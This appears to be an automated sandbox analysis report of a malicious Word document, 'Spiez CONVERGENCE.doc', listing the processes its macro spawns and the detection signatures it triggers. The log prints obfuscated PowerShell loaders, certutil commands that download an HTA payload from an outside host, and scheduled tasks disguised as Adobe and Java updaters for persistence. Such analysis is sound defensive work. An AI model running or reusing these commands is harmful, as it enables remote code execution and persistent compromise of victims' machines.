Source: unknown	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3664 -s 1460
Source: unknown	Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\system32\schtasks.exe' /query
Source: unknown	Process created: C:\Windows\System32\findstr.exe 'C:\Windows\system32\findstr.exe' /i AdobeUpdateTaskDailyCore
Source: unknown	Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RL HIGHEST /F /SC DAILY /ST 10:00 /TN AdobeUpdateTaskDailyCore /TR 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c \'& $env:isjeuccptoxa ($env:jtkfvddqlpyc + $env:kulgweeimqae + $env:lvmhxfvjnrbg + $env:mwniywwkosci)\''
Source: unknown	Process created: C:\Windows\System32\taskeng.exe taskeng.exe {180BD5BB-1663-4FC8-9FDE-050CD066A9C0} S-1-5-21-312302014-279660585-3511680526-1004:computer\user:Interactive:[1]
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c '& $env:isjeuccptoxa ($env:jtkfvddqlpyc + $env:kulgweeimqae + $env:lvmhxfvjnrbg + $env:mwniywwkosci)'
Source: unknown	Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\system32\schtasks.exe' /query
Source: unknown	Process created: C:\Windows\System32\findstr.exe 'C:\Windows\system32\findstr.exe' /i JavaUpdateTaskCore
Source: unknown	Process created: C:\Windows\System32\certutil.exe 'C:\Windows\System32\certutil.exe' -urlcache -split -f https://mysent.org/access.log.txt C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportArchive\sysmodule.hta
Source: unknown	Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RL HIGHEST /F /SC DAILY /ST 11:10 /TN JavaUpdateTaskCore /TR C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportArchive\sysmodule.hta
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe 'C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportArchive\sysmodule.hta'
Source: unknown	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C 'set KjV= SeT-VarIABlE eiP ( [tYPe]('{7}{5}{1}{11}{0}{3}{2}{6}{8}{4}{10}{9}{12}' -F 'D','tioN','onArY','icti','tE','LlEC','[ST','cO','RinG,SYS','OBJ','M.','S.GenerIC.','eCT') ) ; ${tV`R`32} =[tYpE]('{2}{0}{3}{1}'-F'R','loCK','SC','iPtB') ; ${g`Nf} = [type]('{1}{0}' -F'f','RE') ; Set-iTeM ('vAriaB'+'le:R'+'tHA'+'C5') ( [type]('{7}{6}{5}{3}{2}{1}{8}{0}{4}'-f'N','epOi','Ic','v','aGER','et.sEr','Tem.n','sys','NTma') ); seT qcj ( [tyPe]('{1}{3}{6}{4}{5}{0}{2}' -F'uE','sY','st','sTE','WeB','rEQ','M.Net.') ) ; sET-iTem VAriAblE:eSY ( [tyPE]('{1}{0}{4}{2}{3}' -F'YsTeM.NeT.','S','DEN','TIALCAchE','CRe'));set-iTem VARIaBLe:r4imz ( [type]('{2}{4}{0}{3}{1}'-F 'T.EN','iNg','SysTem.te','cOD','X') ) ;If(${pS`Vers`ionTa`Ble}.'P`SVersION'.'MaJ`OR' -GE 3){${g`PF}= ${G`Nf}.'aSsE`mb`Ly'.('{1}{0}' -f'tTYPe','GE').Invoke(('{6}{1}{0}{3}{2}{4}{7}{5}' -f'na','tem.Ma','nt.Autom','geme','ati','.Utils','Sys','on')).'GETFiE`LD'(('{0}{4}{2}{1}{3}'-f 'c
Source: unknown	Process created: C:\Windows\System32\cmd.exe CMD.ExE /C%OmWi%
Source: unknown	Process created: C:\Windows\System32\cmd.exe unknown
Source: unknown	Process created: C:\Windows\System32\cmd.exe unknown
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\cmd.exe 'C:\WinDoWS\sysTEm32\CMD.EXe' /c 'SeT STI= $iBHrW = [tyPE]('{2}{7}{8}{3}{0}{5}{1}{6}{4}'-f 'ERi','RING,s','COLLE','En','.obJECT','c.DiCtiONARy[st','yStEM','c','tIoNs.g'); .('{0}{1}{2}'-f'S','ET','-iTEM') ('{0}{2}{1}' -f 'VAr','Le:7B1M','iAB') ([tYPe]('{2}{3}{1}{0}' -f'Ock','l','s','crIptb') ) ; $MZS=[tYPE]('{0}{1}'-F 'R','EF') ; ^&('{1}{2}{0}'-f '-iTEM','SE','T') ('{1}{0}{2}'-f'iAbL','vAr','e:04k') ( [tyPe]('{4}{3}{0}{1}{5}{2}'-f '.seRvICEp','o','AnAGeR','.nET','SySTeM','IntM')) ; $Nva1I = [tyPe]('{0}{1}{6}{4}{2}{5}{3}'-F'SY','StE','t.WE','ueST','.ne','BrEQ','m'); .('{2}{0}{1}' -f'E','M','seT-iT') ('V'+'Ar'+'Ia'+'Ble:kmd') ( [tYPe]('{6}{3}{4}{5}{0}{2}{1}'-F'nTIalcA','HE','c','ste','M.n','eT.CRede','sY')) ; $bqvM = [TypE]('{2}{0}{4}{1}{5}{3}'-F'TE','c','syS','ING','m.tExT.en','Od') ;[string[]] ${P`Ath} = .('{2}{3}{0}{1}' -f 'hi','ldItem','Get-','C') -Recurse -LiteralPath '$env:USERPROFILE\\AppData\\Local\\Microsoft' -ErrorAction ('{1}{4}{0}{3}{2}'-f'tlyC','Si	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\microsoft shared\DW\DW20.EXE 'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 1516	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3664 -s 1460	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\WinDoWS\sysTEm32\CMD.EXe /c%rbH%	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' eChO ieX (gCi ENv:STi).VALUe '	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRshell -noNInteraC -ex byPASs -NopRofIlE -NOExIT -wInDows HiDdEN -	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\certutil.exe 'C:\Windows\System32\certutil.exe' -urlcache -split -f https://mysent.org/access.log.txt C:\Users\user\AppData\Local\Microsoft\Windows\Ringtones\libsys.hta	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C 'set KjV= SeT-VarIABlE eiP ( [tYPe]('{7}{5}{1}{11}{0}{3}{2}{6}{8}{4}{10}{9}{12}' -F 'D','tioN','onArY','icti','tE','LlEC','[ST','cO','RinG,SYS','OBJ','M.','S.GenerIC.','eCT') ) ; ${tV`R`32} =[tYpE]('{2}{0}{3}{1}'-F'R','loCK','SC','iPtB') ; ${g`Nf} = [type]('{1}{0}' -F'f','RE') ; Set-iTeM ('vAriaB'+'le:R'+'tHA'+'C5') ( [type]('{7}{6}{5}{3}{2}{1}{8}{0}{4}'-f'N','epOi','Ic','v','aGER','et.sEr','Tem.n','sys','NTma') ); seT qcj ( [tyPe]('{1}{3}{6}{4}{5}{0}{2}' -F'uE','sY','st','sTE','WeB','rEQ','M.Net.') ) ; sET-iTem VAriAblE:eSY ( [tyPE]('{1}{0}{4}{2}{3}' -F'YsTeM.NeT.','S','DEN','TIALCAchE','CRe'));set-iTem VARIaBLe:r4imz ( [type]('{2}{4}{0}{3}{1}'-F 'T.EN','iNg','SysTem.te','cOD','X') ) ;If(${pS`Vers`ionTa`Ble}.'P`SVersION'.'MaJ`OR' -GE 3){${g`PF}= ${G`Nf}.'aSsE`mb`Ly'.('{1}{0}' -f'tTYPe','GE').Invoke(('{6}{1}{0}{3}{2}{4}{7}{5}' -f'na','tem.Ma','nt.Autom','geme','ati','.Utils','Sys','on')).'GETFiE`LD'(('{0}{4}{2}{1}{3}'-f 'c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe CMD.ExE /C%OmWi%
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' ecHo IEX (GI enV:Kjv).valUe '
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powERSHeLl -nOnInTeRac -eXecUTiOn byPASs -NOeX -NoPRofiL -WiN hIddEN -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\system32\schtasks.exe' /query
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\findstr.exe 'C:\Windows\system32\findstr.exe' /i AdobeUpdateTaskDailyCore
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RL HIGHEST /F /SC DAILY /ST 10:00 /TN AdobeUpdateTaskDailyCore /TR 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c \'& $env:isjeuccptoxa ($env:jtkfvddqlpyc + $env:kulgweeimqae + $env:lvmhxfvjnrbg + $env:mwniywwkosci)\''
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\system32\schtasks.exe' /query
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\findstr.exe 'C:\Windows\system32\findstr.exe' /i JavaUpdateTaskCore
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\certutil.exe 'C:\Windows\System32\certutil.exe' -urlcache -split -f https://mysent.org/access.log.txt C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportArchive\sysmodule.hta
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RL HIGHEST /F /SC DAILY /ST 11:10 /TN JavaUpdateTaskCore /TR C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportArchive\sysmodule.hta
Source: C:\Program Files\Common Files\microsoft shared\DW\DW20.EXE	Process created: C:\Windows\System32\DWWIN.EXE C:\Windows\system32\dwwin.exe -x -s 1516
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c '& $env:isjeuccptoxa ($env:jtkfvddqlpyc + $env:kulgweeimqae + $env:lvmhxfvjnrbg + $env:mwniywwkosci)'
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe 'C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportArchive\sysmodule.hta'
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C 'set KjV= SeT-VarIABlE eiP ( [tYPe]('{7}{5}{1}{11}{0}{3}{2}{6}{8}{4}{10}{9}{12}' -F 'D','tioN','onArY','icti','tE','LlEC','[ST','cO','RinG,SYS','OBJ','M.','S.GenerIC.','eCT') ) ; ${tV`R`32} =[tYpE]('{2}{0}{3}{1}'-F'R','loCK','SC','iPtB') ; ${g`Nf} = [type]('{1}{0}' -F'f','RE') ; Set-iTeM ('vAriaB'+'le:R'+'tHA'+'C5') ( [type]('{7}{6}{5}{3}{2}{1}{8}{0}{4}'-f'N','epOi','Ic','v','aGER','et.sEr','Tem.n','sys','NTma') ); seT qcj ( [tyPe]('{1}{3}{6}{4}{5}{0}{2}' -F'uE','sY','st','sTE','WeB','rEQ','M.Net.') ) ; sET-iTem VAriAblE:eSY ( [tyPE]('{1}{0}{4}{2}{3}' -F'YsTeM.NeT.','S','DEN','TIALCAchE','CRe'));set-iTem VARIaBLe:r4imz ( [type]('{2}{4}{0}{3}{1}'-F 'T.EN','iNg','SysTem.te','cOD','X') ) ;If(${pS`Vers`ionTa`Ble}.'P`SVersION'.'MaJ`OR' -GE 3){${g`PF}= ${G`Nf}.'aSsE`mb`Ly'.('{1}{0}' -f'tTYPe','GE').Invoke(('{6}{1}{0}{3}{2}{4}{7}{5}' -f'na','tem.Ma','nt.Autom','geme','ati','.Utils','Sys','on')).'GETFiE`LD'(('{0}{4}{2}{1}{3}'-f 'c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe CMD.ExE /C%OmWi%
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe unknown

Uses an in-process (OLE) Automation server

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{77F10CF0-3DB5-4966-B520-B7C54FD35ED6}\InProcServer32

Jump to behavior

Reads internet explorer settings

Show sources

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_USERS\Software\Microsoft\Internet Explorer\Settings

Found graphical window changes (likely an installer)

Show sources

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses Microsoft Silverlight

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Jump to behavior

Checks if Microsoft Office is installed

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_USERS\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll

Jump to behavior

Binary contains paths to debug symbols

Show sources

Source:	Binary string: ]ntdll.pdb source: WerFault.exe, 00000011.00000002.16438650422.01B56000.00000004.sdmp
Source:	Binary string: C:\Windows\mscorlib.pdb;; source: powershell.exe, 0000000E.00000002.16532283238.01307000.00000004.sdmp
Source:	Binary string: ntdll.pdb( source: WerFault.exe, 00000011.00000003.16411165339.005F2000.00000004.sdmp
Source:	Binary string: mscorlib.pdb source: powershell.exe, 0000000E.00000002.16532283238.01307000.00000004.sdmp
Source:	Binary string: kernel32.pdb( source: WerFault.exe, 00000011.00000003.16411165339.005F2000.00000004.sdmp
Source:	Binary string: KiUserCallbackDispatcherRSDSntdll.pdb source: WerFault.exe, 00000011.00000002.16432926239.000C6000.00000004.sdmp
Source:	Binary string: C:\Windows\dll\System.pdb source: powershell.exe, 00000006.00000002.16523226606.04DDD000.00000004.sdmp
Source:	Binary string: mscorlib.pdbX source: powershell.exe, 0000000E.00000002.16532283238.01307000.00000004.sdmp
Source:	Binary string: ntdll.pdb source: WerFault.exe, 00000011.00000002.16438650422.01B56000.00000004.sdmp
Source:	Binary string: kernel32C:\Windows\system32\kernel32.dllC:\Windows\system32\kernel32.dllRSDSkernel32.pdb source: WerFault.exe, 00000011.00000002.16432926239.000C6000.00000004.sdmp
Source:	Binary string: kernel32.pdb source: WerFault.exe, 00000011.00000002.16435603311.005EA000.00000004.sdmp
Source:	Binary string: indows\mscorlib.pdbpdblib.pdb source: powershell.exe, 0000000E.00000002.16532283238.01307000.00000004.sdmp
Source:	Binary string: ]ntdll.pdb@Y source: WerFault.exe, 00000011.00000003.16410861797.01B21000.00000004.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb" -f'G- source: powershell.exe, 00000006.00000002.16518634850.01260000.00000004.sdmp
Source:	Binary string: em.pdb source: powershell.exe, 00000006.00000002.16523226606.04DDD000.00000004.sdmp, powershell.exe, 0000000E.00000002.16532283238.01307000.00000004.sdmp
Source:	Binary string: D:\office\Target\word\x86\ship\0\msword.PDB source: WINWORD.EXE, 00000001.00000002.16437942548.01880000.00000002.sdmp
Source:	Binary string: indows\System.pdbpdbtem.pdb source: powershell.exe, 00000006.00000002.16518634850.01260000.00000004.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.pdb source: powershell.exe, 00000006.00000002.16523226606.04DDD000.00000004.sdmp, powershell.exe, 0000000E.00000002.16532283238.01307000.00000004.sdmp
Source:	Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 0000000E.00000002.16532283238.01307000.00000004.sdmp
Source:	Binary string: mscorrc.pdb source: powershell.exe, 00000006.00000002.16522692974.03EC0000.00000002.sdmp, powershell.exe, 0000000E.00000002.16535201830.01B90000.00000002.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000006.00000002.16523226606.04DDD000.00000004.sdmp
Source:	Binary string: C:\Windows\System.pdb source: powershell.exe, 00000006.00000002.16523226606.04DDD000.00000004.sdmp

Data Obfuscation:

Document contains an embedded VBA with many randomly named variables

Show sources

Source: Spiez CONVERGENCE.doc

Stream path 'Macros/VBA/ThisDocument' : High entropy of concatenated variable names

Document contains an embedded VBA with many string operations indicating source code obfuscation

Show sources

Source: Spiez CONVERGENCE.doc	Stream path 'Macros/VBA/ThisDocument' : High number of string operations
Source: VBA code instrumentation	OLE, VBA macro, High number of string operations: Module ThisDocument			Name: ThisDocument

Obfuscated command line found

Show sources

Source: unknown	Process created: C:\Windows\System32\cmd.exe 'C:\WinDoWS\sysTEm32\CMD.EXe' /c 'SeT STI= $iBHrW = [tyPE]('{2}{7}{8}{3}{0}{5}{1}{6}{4}'-f 'ERi','RING,s','COLLE','En','.obJECT','c.DiCtiONARy[st','yStEM','c','tIoNs.g'); .('{0}{1}{2}'-f'S','ET','-iTEM') ('{0}{2}{1}' -f 'VAr','Le:7B1M','iAB') ([tYPe]('{2}{3}{1}{0}' -f'Ock','l','s','crIptb') ) ; $MZS=[tYPE]('{0}{1}'-F 'R','EF') ; ^&('{1}{2}{0}'-f '-iTEM','SE','T') ('{1}{0}{2}'-f'iAbL','vAr','e:04k') ( [tyPe]('{4}{3}{0}{1}{5}{2}'-f '.seRvICEp','o','AnAGeR','.nET','SySTeM','IntM')) ; $Nva1I = [tyPe]('{0}{1}{6}{4}{2}{5}{3}'-F'SY','StE','t.WE','ueST','.ne','BrEQ','m'); .('{2}{0}{1}' -f'E','M','seT-iT') ('V'+'Ar'+'Ia'+'Ble:kmd') ( [tYPe]('{6}{3}{4}{5}{0}{2}{1}'-F'nTIalcA','HE','c','ste','M.n','eT.CRede','sY')) ; $bqvM = [TypE]('{2}{0}{4}{1}{5}{3}'-F'TE','c','syS','ING','m.tExT.en','Od') ;[string[]] ${P`Ath} = .('{2}{3}{0}{1}' -f 'hi','ldItem','Get-','C') -Recurse -LiteralPath '$env:USERPROFILE\\AppData\\Local\\Microsoft' -ErrorAction ('{1}{4}{0}{3}{2}'-f'tlyC','Si
Source: unknown	Process created: C:\Windows\System32\cmd.exe 'C:\WinDoWS\sysTEm32\CMD.EXe' /c 'SeT STI= $iBHrW = [tyPE]('{2}{7}{8}{3}{0}{5}{1}{6}{4}'-f 'ERi','RING,s','COLLE','En','.obJECT','c.DiCtiONARy[st','yStEM','c','tIoNs.g'); .('{0}{1}{2}'-f'S','ET','-iTEM') ('{0}{2}{1}' -f 'VAr','Le:7B1M','iAB') ([tYPe]('{2}{3}{1}{0}' -f'Ock','l','s','crIptb') ) ; $MZS=[tYPE]('{0}{1}'-F 'R','EF') ; ^&('{1}{2}{0}'-f '-iTEM','SE','T') ('{1}{0}{2}'-f'iAbL','vAr','e:04k') ( [tyPe]('{4}{3}{0}{1}{5}{2}'-f '.seRvICEp','o','AnAGeR','.nET','SySTeM','IntM')) ; $Nva1I = [tyPe]('{0}{1}{6}{4}{2}{5}{3}'-F'SY','StE','t.WE','ueST','.ne','BrEQ','m'); .('{2}{0}{1}' -f'E','M','seT-iT') ('V'+'Ar'+'Ia'+'Ble:kmd') ( [tYPe]('{6}{3}{4}{5}{0}{2}{1}'-F'nTIalcA','HE','c','ste','M.n','eT.CRede','sY')) ; $bqvM = [TypE]('{2}{0}{4}{1}{5}{3}'-F'TE','c','syS','ING','m.tExT.en','Od') ;[string[]] ${P`Ath} = .('{2}{3}{0}{1}' -f 'hi','ldItem','Get-','C') -Recurse -LiteralPath '$env:USERPROFILE\\AppData\\Local\\Microsoft' -ErrorAction ('{1}{4}{0}{3}{2}'-f'tlyC','Si
Source: unknown	Process created: C:\Windows\System32\cmd.exe 'C:\WinDoWS\sysTEm32\CMD.EXe' /c 'SeT STI= $iBHrW = [tyPE]('{2}{7}{8}{3}{0}{5}{1}{6}{4}'-f 'ERi','RING,s','COLLE','En','.obJECT','c.DiCtiONARy[st','yStEM','c','tIoNs.g'); .('{0}{1}{2}'-f'S','ET','-iTEM') ('{0}{2}{1}' -f 'VAr','Le:7B1M','iAB') ([tYPe]('{2}{3}{1}{0}' -f'Ock','l','s','crIptb') ) ; $MZS=[tYPE]('{0}{1}'-F 'R','EF') ; ^&('{1}{2}{0}'-f '-iTEM','SE','T') ('{1}{0}{2}'-f'iAbL','vAr','e:04k') ( [tyPe]('{4}{3}{0}{1}{5}{2}'-f '.seRvICEp','o','AnAGeR','.nET','SySTeM','IntM')) ; $Nva1I = [tyPe]('{0}{1}{6}{4}{2}{5}{3}'-F'SY','StE','t.WE','ueST','.ne','BrEQ','m'); .('{2}{0}{1}' -f'E','M','seT-iT') ('V'+'Ar'+'Ia'+'Ble:kmd') ( [tYPe]('{6}{3}{4}{5}{0}{2}{1}'-F'nTIalcA','HE','c','ste','M.n','eT.CRede','sY')) ; $bqvM = [TypE]('{2}{0}{4}{1}{5}{3}'-F'TE','c','syS','ING','m.tExT.en','Od') ;[string[]] ${P`Ath} = .('{2}{3}{0}{1}' -f 'hi','ldItem','Get-','C') -Recurse -LiteralPath '$env:USERPROFILE\\AppData\\Local\\Microsoft' -ErrorAction ('{1}{4}{0}{3}{2}'-f'tlyC','Si
Source: unknown	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C 'set KjV= SeT-VarIABlE eiP ( [tYPe]('{7}{5}{1}{11}{0}{3}{2}{6}{8}{4}{10}{9}{12}' -F 'D','tioN','onArY','icti','tE','LlEC','[ST','cO','RinG,SYS','OBJ','M.','S.GenerIC.','eCT') ) ; ${tV`R`32} =[tYpE]('{2}{0}{3}{1}'-F'R','loCK','SC','iPtB') ; ${g`Nf} = [type]('{1}{0}' -F'f','RE') ; Set-iTeM ('vAriaB'+'le:R'+'tHA'+'C5') ( [type]('{7}{6}{5}{3}{2}{1}{8}{0}{4}'-f'N','epOi','Ic','v','aGER','et.sEr','Tem.n','sys','NTma') ); seT qcj ( [tyPe]('{1}{3}{6}{4}{5}{0}{2}' -F'uE','sY','st','sTE','WeB','rEQ','M.Net.') ) ; sET-iTem VAriAblE:eSY ( [tyPE]('{1}{0}{4}{2}{3}' -F'YsTeM.NeT.','S','DEN','TIALCAchE','CRe'));set-iTem VARIaBLe:r4imz ( [type]('{2}{4}{0}{3}{1}'-F 'T.EN','iNg','SysTem.te','cOD','X') ) ;If(${pS`Vers`ionTa`Ble}.'P`SVersION'.'MaJ`OR' -GE 3){${g`PF}= ${G`Nf}.'aSsE`mb`Ly'.('{1}{0}' -f'tTYPe','GE').Invoke(('{6}{1}{0}{3}{2}{4}{7}{5}' -f'na','tem.Ma','nt.Autom','geme','ati','.Utils','Sys','on')).'GETFiE`LD'(('{0}{4}{2}{1}{3}'-f 'c
Source: unknown	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C 'set KjV= SeT-VarIABlE eiP ( [tYPe]('{7}{5}{1}{11}{0}{3}{2}{6}{8}{4}{10}{9}{12}' -F 'D','tioN','onArY','icti','tE','LlEC','[ST','cO','RinG,SYS','OBJ','M.','S.GenerIC.','eCT') ) ; ${tV`R`32} =[tYpE]('{2}{0}{3}{1}'-F'R','loCK','SC','iPtB') ; ${g`Nf} = [type]('{1}{0}' -F'f','RE') ; Set-iTeM ('vAriaB'+'le:R'+'tHA'+'C5') ( [type]('{7}{6}{5}{3}{2}{1}{8}{0}{4}'-f'N','epOi','Ic','v','aGER','et.sEr','Tem.n','sys','NTma') ); seT qcj ( [tyPe]('{1}{3}{6}{4}{5}{0}{2}' -F'uE','sY','st','sTE','WeB','rEQ','M.Net.') ) ; sET-iTem VAriAblE:eSY ( [tyPE]('{1}{0}{4}{2}{3}' -F'YsTeM.NeT.','S','DEN','TIALCAchE','CRe'));set-iTem VARIaBLe:r4imz ( [type]('{2}{4}{0}{3}{1}'-F 'T.EN','iNg','SysTem.te','cOD','X') ) ;If(${pS`Vers`ionTa`Ble}.'P`SVersION'.'MaJ`OR' -GE 3){${g`PF}= ${G`Nf}.'aSsE`mb`Ly'.('{1}{0}' -f'tTYPe','GE').Invoke(('{6}{1}{0}{3}{2}{4}{7}{5}' -f'na','tem.Ma','nt.Autom','geme','ati','.Utils','Sys','on')).'GETFiE`LD'(('{0}{4}{2}{1}{3}'-f 'c
Source: unknown	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C 'set KjV= SeT-VarIABlE eiP ( [tYPe]('{7}{5}{1}{11}{0}{3}{2}{6}{8}{4}{10}{9}{12}' -F 'D','tioN','onArY','icti','tE','LlEC','[ST','cO','RinG,SYS','OBJ','M.','S.GenerIC.','eCT') ) ; ${tV`R`32} =[tYpE]('{2}{0}{3}{1}'-F'R','loCK','SC','iPtB') ; ${g`Nf} = [type]('{1}{0}' -F'f','RE') ; Set-iTeM ('vAriaB'+'le:R'+'tHA'+'C5') ( [type]('{7}{6}{5}{3}{2}{1}{8}{0}{4}'-f'N','epOi','Ic','v','aGER','et.sEr','Tem.n','sys','NTma') ); seT qcj ( [tyPe]('{1}{3}{6}{4}{5}{0}{2}' -F'uE','sY','st','sTE','WeB','rEQ','M.Net.') ) ; sET-iTem VAriAblE:eSY ( [tyPE]('{1}{0}{4}{2}{3}' -F'YsTeM.NeT.','S','DEN','TIALCAchE','CRe'));set-iTem VARIaBLe:r4imz ( [type]('{2}{4}{0}{3}{1}'-F 'T.EN','iNg','SysTem.te','cOD','X') ) ;If(${pS`Vers`ionTa`Ble}.'P`SVersION'.'MaJ`OR' -GE 3){${g`PF}= ${G`Nf}.'aSsE`mb`Ly'.('{1}{0}' -f'tTYPe','GE').Invoke(('{6}{1}{0}{3}{2}{4}{7}{5}' -f'na','tem.Ma','nt.Autom','geme','ati','.Utils','Sys','on')).'GETFiE`LD'(('{0}{4}{2}{1}{3}'-f 'c
Source: unknown	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C 'set KjV= SeT-VarIABlE eiP ( [tYPe]('{7}{5}{1}{11}{0}{3}{2}{6}{8}{4}{10}{9}{12}' -F 'D','tioN','onArY','icti','tE','LlEC','[ST','cO','RinG,SYS','OBJ','M.','S.GenerIC.','eCT') ) ; ${tV`R`32} =[tYpE]('{2}{0}{3}{1}'-F'R','loCK','SC','iPtB') ; ${g`Nf} = [type]('{1}{0}' -F'f','RE') ; Set-iTeM ('vAriaB'+'le:R'+'tHA'+'C5') ( [type]('{7}{6}{5}{3}{2}{1}{8}{0}{4}'-f'N','epOi','Ic','v','aGER','et.sEr','Tem.n','sys','NTma') ); seT qcj ( [tyPe]('{1}{3}{6}{4}{5}{0}{2}' -F'uE','sY','st','sTE','WeB','rEQ','M.Net.') ) ; sET-iTem VAriAblE:eSY ( [tyPE]('{1}{0}{4}{2}{3}' -F'YsTeM.NeT.','S','DEN','TIALCAchE','CRe'));set-iTem VARIaBLe:r4imz ( [type]('{2}{4}{0}{3}{1}'-F 'T.EN','iNg','SysTem.te','cOD','X') ) ;If(${pS`Vers`ionTa`Ble}.'P`SVersION'.'MaJ`OR' -GE 3){${g`PF}= ${G`Nf}.'aSsE`mb`Ly'.('{1}{0}' -f'tTYPe','GE').Invoke(('{6}{1}{0}{3}{2}{4}{7}{5}' -f'na','tem.Ma','nt.Autom','geme','ati','.Utils','Sys','on')).'GETFiE`LD'(('{0}{4}{2}{1}{3}'-f 'c
Source: unknown	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C 'set KjV= SeT-VarIABlE eiP ( [tYPe]('{7}{5}{1}{11}{0}{3}{2}{6}{8}{4}{10}{9}{12}' -F 'D','tioN','onArY','icti','tE','LlEC','[ST','cO','RinG,SYS','OBJ','M.','S.GenerIC.','eCT') ) ; ${tV`R`32} =[tYpE]('{2}{0}{3}{1}'-F'R','loCK','SC','iPtB') ; ${g`Nf} = [type]('{1}{0}' -F'f','RE') ; Set-iTeM ('vAriaB'+'le:R'+'tHA'+'C5') ( [type]('{7}{6}{5}{3}{2}{1}{8}{0}{4}'-f'N','epOi','Ic','v','aGER','et.sEr','Tem.n','sys','NTma') ); seT qcj ( [tyPe]('{1}{3}{6}{4}{5}{0}{2}' -F'uE','sY','st','sTE','WeB','rEQ','M.Net.') ) ; sET-iTem VAriAblE:eSY ( [tyPE]('{1}{0}{4}{2}{3}' -F'YsTeM.NeT.','S','DEN','TIALCAchE','CRe'));set-iTem VARIaBLe:r4imz ( [type]('{2}{4}{0}{3}{1}'-F 